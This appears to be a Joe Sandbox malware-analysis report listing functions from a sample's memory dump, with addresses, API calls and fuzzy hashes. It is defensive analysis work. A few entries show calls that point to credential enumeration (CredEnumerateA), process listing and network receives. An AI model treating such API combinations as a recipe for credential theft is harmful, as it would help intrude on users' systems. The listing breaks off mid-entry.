Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 73155330-0
Opcode ID: e2e12fc60d6456e700a8a5d7db215d80e281faf3cf2bd2de2e2602360e342098
Instruction ID: 2aca1f4bd303c9731d1210d24af1a2e5603fc96f3b894f6299ff4e74dd85aa50
Opcode Fuzzy Hash: e2e12fc60d6456e700a8a5d7db215d80e281faf3cf2bd2de2e2602360e342098
Instruction Fuzzy Hash: 4631D362B2CBCA41FE14DB16AC8457A6250FB44BE4F944A35DEADC77D5CE3CE0418345

Function 00007FF621859030 Relevance: 3.1, APIs: 2, Instructions: 118COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6218591AC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218591B2

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 73155330-0
Opcode ID: 600088ee7cf2154f4542adff2feae53cf13f5379ccdac174d734b05de36d8b1a
Instruction ID: ac0975a250eb26fa18f9d58fae5773e66b28ecc970e98c88cc3bcb4c7e7f4bb6
Opcode Fuzzy Hash: 600088ee7cf2154f4542adff2feae53cf13f5379ccdac174d734b05de36d8b1a
Instruction Fuzzy Hash: B341BF62B0CB4295EF20AF12AD843ADA251EB04BD4F584A35DE6ECB7C6DE3CD1418342

Function 00007FF621858D10 Relevance: 3.1, APIs: 2, Instructions: 109COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF621858E6B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621858E71

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 73155330-0
Opcode ID: ab1b16d1098ee7780a25b04fe5d6dd3498d886f46a21ea41c63caef294e5168f
Instruction ID: df665abffaff68400d6e8d3c7b87218942fb29f7e5ddf1ebca6a9952789bdcb3
Opcode Fuzzy Hash: ab1b16d1098ee7780a25b04fe5d6dd3498d886f46a21ea41c63caef294e5168f
Instruction Fuzzy Hash: 2731F97270D78199EF149B12AD843ADA291EB05BD4F590632DE5ECB7D6DE3CE041D301

Function 00007FF621896290 Relevance: 3.1, APIs: 2, Instructions: 107COMMON

Download Yara Rule

APIs

GetVolumeInformationW.KERNEL32 ref: 00007FF621896320
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621896457

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: InformationVolume_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 4269842375-0
Opcode ID: 2ab9dccd8fc6a624d4053b93977b84de6daf3c14240ec2156bca21e3bdef3e2f
Instruction ID: 827aa0d38c36a4df4ef87e36ca5bdb7ea8b0cfc22380c976dda66219b57b1fb7
Opcode Fuzzy Hash: 2ab9dccd8fc6a624d4053b93977b84de6daf3c14240ec2156bca21e3bdef3e2f
Instruction Fuzzy Hash: A5518133E18B818AEB10CF64D8803AD7764FB95788F605225EB9C93A99DF7CD584C741

Function 00007FF6218529B0 Relevance: 3.1, APIs: 2, Instructions: 93COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621852AB2
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF621852AB8

Part of subcall function 00007FF62183B820: __std_exception_copy.LIBVCRUNTIME ref: 00007FF62183B868

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: Concurrency::cancel_current_task__std_exception_copy_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2371198981-0
Opcode ID: b877bc5c1e1706bbbac12123d48b15ce7493262ddada9eeecf2dd508b60f9e1c
Instruction ID: 77dc2f8f87604d32cdc2971025e73d715e14a002460e11f9fc223d5ae0651deb
Opcode Fuzzy Hash: b877bc5c1e1706bbbac12123d48b15ce7493262ddada9eeecf2dd508b60f9e1c
Instruction Fuzzy Hash: 42210A22E0DB4285EF29AB15A9803786291EB54BE4F254731DA7DC77C2EE3CD4D28342

Function 00007FF6218A4648 Relevance: 3.1, APIs: 2, Instructions: 77COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6218A466F

Part of subcall function 00007FF6218A4604: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6218A461B

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6218A4723

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 77ff38050bbf038ec147631c291faae903e00292372ea36fba1d268a897535c6
Instruction ID: 2b50d86f8d8c8c7c0d2433fb2261336e4fd726f26c07a2fd439755b1a958a3d1
Opcode Fuzzy Hash: 77ff38050bbf038ec147631c291faae903e00292372ea36fba1d268a897535c6
Instruction Fuzzy Hash: D9319A32A1DA8683EF54DB14EC911B92760AB95B94F990131EA1EC73E2EF3CE1118303

Function 00007FF62188D510 Relevance: 3.1, APIs: 2, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32 ref: 00007FF62188D561
RegCloseKey.ADVAPI32 ref: 00007FF62188D573

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: CloseOpen
String ID:
API String ID: 47109696-0
Opcode ID: f1dca321947a1367f0d55f51290a78f41f5e328790fa86022a41bb21031095aa
Instruction ID: b63ddbc16ffab45d1eb64ea66e910902ed6b587f399566fe130cc170cce69db8
Opcode Fuzzy Hash: f1dca321947a1367f0d55f51290a78f41f5e328790fa86022a41bb21031095aa
Instruction Fuzzy Hash: 8C21B421B1CA4546EF509B25EC803BAA360EF98BD8F195232FA4DC7B95EE2DD5818701

Function 00007FF62185AE50 Relevance: 3.1, APIs: 2, Instructions: 66COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62185AEA1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62185AF0A

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 9fff4df49810f0034ffefad36caed1baeebc5d19ae4df4fb250bb05657921bfc
Instruction ID: 96b13ce5762076192df2c5f0fb7fcf267ad53d6774b818d5bf47fa3d183875a3
Opcode Fuzzy Hash: 9fff4df49810f0034ffefad36caed1baeebc5d19ae4df4fb250bb05657921bfc
Instruction Fuzzy Hash: EB11B2A2B1AB8559EF488F74D8D437C6391EB08F94F244930DA6DC6785DF3CC4948301

Function 00007FF62188C7CC Relevance: 3.1, APIs: 2, Instructions: 58synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF62184E610: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF62184E65A
Part of subcall function 00007FF62184E610: Process32FirstW.KERNEL32 ref: 00007FF62184E69C

Part of subcall function 00007FF62184CA10: CredEnumerateA.ADVAPI32 ref: 00007FF62184CA72

Part of subcall function 00007FF621894A30: recv.WS2_32 ref: 00007FF621894C0C

ReleaseMutex.KERNEL32 ref: 00007FF62188C83B
CloseHandle.KERNEL32 ref: 00007FF62188C844

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: CloseCreateCredEnumerateFirstHandleMutexProcess32ReleaseSnapshotToolhelp32recv
String ID:
API String ID: 420082584-0
Opcode ID: a241a9e8f0a5ae92ebc4a82896f808c7eb0105769aa3d49b327d64c488894cf4
Instruction ID: 511d31037e265bdcd3e240e7551cde632c5321cb54558732a786e68748a07093
Opcode Fuzzy Hash: a241a9e8f0a5ae92ebc4a82896f808c7eb0105769aa3d49b327d64c488894cf4
Instruction Fuzzy Hash: 2D21AF12E6D68B42FF20BBB4ACC63FD5244AF853A0F145A30EA5EC55DB9F1CB0409213

Function 00007FF62188C7FD Relevance: 3.0, APIs: 2, Instructions: 47synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF621894A30: recv.WS2_32 ref: 00007FF621894C0C

ReleaseMutex.KERNEL32 ref: 00007FF62188C83B
CloseHandle.KERNEL32 ref: 00007FF62188C844

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: CloseHandleMutexReleaserecv
String ID:
API String ID: 2659716615-0
Opcode ID: a4287542b519ad2aed6a7c2284c430a8ab02f39b96d58b3069176ce8d2b0cb69
Instruction ID: 1d93bf633f79566a9b1b2dd471e7414c28518fb46083dce0523c31ec2a8a694c
Opcode Fuzzy Hash: a4287542b519ad2aed6a7c2284c430a8ab02f39b96d58b3069176ce8d2b0cb69
Instruction Fuzzy Hash: 3311C212E5D68B42FF60BB74AC863FD5250AF857E0F145630EA9EC16DB9F1CE0408213

Function 00007FF6218B0E9C Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,?,?,?,?,00007FF6218B0E88,?,?,?,?,00000000,00007FF6218B0F91), ref: 00007FF6218B0EE8
GetLastError.KERNEL32(?,?,?,?,?,00007FF6218B0E88,?,?,?,?,00000000,00007FF6218B0F91), ref: 00007FF6218B0EF2

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 85342b8448b5f83962e520861b5040a532baca975cc467821ece28218af4e603
Instruction ID: 03dba9d21da88516aaad0c3d9de21d88d4d2445c11cf224b53fecfc08dd58427
Opcode Fuzzy Hash: 85342b8448b5f83962e520861b5040a532baca975cc467821ece28218af4e603
Instruction Fuzzy Hash: 4E11C161B1CB8281DF208B25A884069A3A1FB45BF4F584331EE7DC77E9CE7CD5518701

Function 00007FF6218BE888 Relevance: 3.0, APIs: 2, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6218BE8B8

Part of subcall function 00007FF6218BF8DC: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6218BF8E5

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6218BE8BE

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
String ID:
API String ID: 1173176844-0
Opcode ID: ad7fb39d7d0572768195cdb96d88edf57c93c5d00d8eaa663e4c704e5b7bea2c
Instruction ID: bb2f460a82e041c80efe79d3332093ec81ade0cfbe394f7e51b55de01ea38540
Opcode Fuzzy Hash: ad7fb39d7d0572768195cdb96d88edf57c93c5d00d8eaa663e4c704e5b7bea2c
Instruction Fuzzy Hash: DAE0EC41E1D90B09FF2825B21D850B541400F49371E2C1B30D97DC82C3EE1CA6918152

Function 00007FF6218AD3C8 Relevance: 3.0, APIs: 2, Instructions: 18memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL ref: 00007FF6218AD3DE
GetLastError.KERNEL32 ref: 00007FF6218AD3E8

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: b7253a55b1276d1b57d670979138b52c86c30a15e8b70f9b8b054cc625f4c6ce
Instruction ID: c249bfddf8d41b3f2893738a2f3d8113359ccc76485ecba062f3f209dc637bb1
Opcode Fuzzy Hash: b7253a55b1276d1b57d670979138b52c86c30a15e8b70f9b8b054cc625f4c6ce
Instruction Fuzzy Hash: 74E01785F0EA4693FF18ABF2ACC907512D26F99740F484434E91DC66D2FE2CBA958243

Function 00007FF621853FF0 Relevance: 1.8, APIs: 1, Instructions: 320COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF621860610: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF621860778
Part of subcall function 00007FF621860610: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621860784

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62185447D

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
String ID:
API String ID: 3936042273-0
Opcode ID: 36736efa0b2b5a8cd1f6e25d78d49782aa0274b4ff4e6c2285c80fa925d743fa
Instruction ID: 4f332b14c55e3e1486c6353143110db770a07df908c7dc286363a2cdee622ad7
Opcode Fuzzy Hash: 36736efa0b2b5a8cd1f6e25d78d49782aa0274b4ff4e6c2285c80fa925d743fa
Instruction Fuzzy Hash: 3FE16B22B19A4594FF10CB65E8802AD3B70FB44B98F564136CE5EA7B9AEF3CD490C341

Function 00007FF621850CA0 Relevance: 1.7, APIs: 1, Instructions: 234COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621850FA7

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 890ae7a3a8106076dfda0d01a01d0b30dfb4788d3508c3f413483244b1e1238c
Instruction ID: 5d0ec9ab4eae86ff94daeb773dba898acd7343b99c71a5c22b04836a714c4b7f
Opcode Fuzzy Hash: 890ae7a3a8106076dfda0d01a01d0b30dfb4788d3508c3f413483244b1e1238c
Instruction Fuzzy Hash: 84B16873609A81DAEF208F25D8903AC73A1FB48B98F555632EA5EC7B99DF3CD4548301

Function 00007FF62189D640 Relevance: 1.6, APIs: 1, Instructions: 145COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62189D829

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 8fb7bb82552481908fd74dd90c4e04cbd6435f2077441e095e6bc4ca8ecac1ef
Instruction ID: e96bf284d11955b6682d35b2bc83ed9c04a15b2940b8d716ab55e05d281bbe69
Opcode Fuzzy Hash: 8fb7bb82552481908fd74dd90c4e04cbd6435f2077441e095e6bc4ca8ecac1ef
Instruction Fuzzy Hash: 8351A112F0CAC19AFB118F7898903BC6371AF54748F049721DF8DA6B95EF3DA5918389

Function 00007FF6218AD8C8 Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6218AD8F0

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 506399ceb7efd258d9ee9312528a7fb0108d3bcc24f039aa6e7519c78468f3b6
Instruction ID: f69dcae7394da7a12758cbe72a9c069e362a041da89743818457c7c04bb355f4
Opcode Fuzzy Hash: 506399ceb7efd258d9ee9312528a7fb0108d3bcc24f039aa6e7519c78468f3b6
Instruction Fuzzy Hash: 6241A23290C74587EF648B19E98127973A1EB56B90F181231DA9EC36D1EF6EE402C753

Function 00007FF621895FC0 Relevance: 1.6, APIs: 1, Instructions: 90COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621896147

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 4854badf3b05d3720f7afde46930b926d91a86b1f535f5b1dd1737cd43217433
